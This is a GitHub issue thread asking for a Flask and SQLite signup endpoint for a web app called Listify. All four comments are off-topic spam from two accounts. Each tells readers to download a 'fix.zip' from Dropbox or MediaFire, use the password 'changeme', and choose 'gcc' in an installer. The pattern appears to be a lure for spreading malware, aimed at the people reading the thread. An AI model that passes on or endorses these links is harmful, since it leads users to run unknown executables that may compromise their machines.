### ISSUE TITLE
Implement Signup Functionality On Web

### ISSUE THREAD

**Issue by cobocombo** [cobocombo/Listify#12]
The front end is mainly done for the signup page. Now let's attempt to write the backend code to create a new user with flask and sql3lite, and connect it to the front end already written. 

## Requirements:

* Create a new post endpoint for signing up or creating a new user. 
* Verify we connect this endpoint with the front end code with a fetch api call with js.
* Verify on the front end we verify all information looks correct before continuing. 
* Save the new user to the database. 
* After signup, redirect the customer to the dashboard page.

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
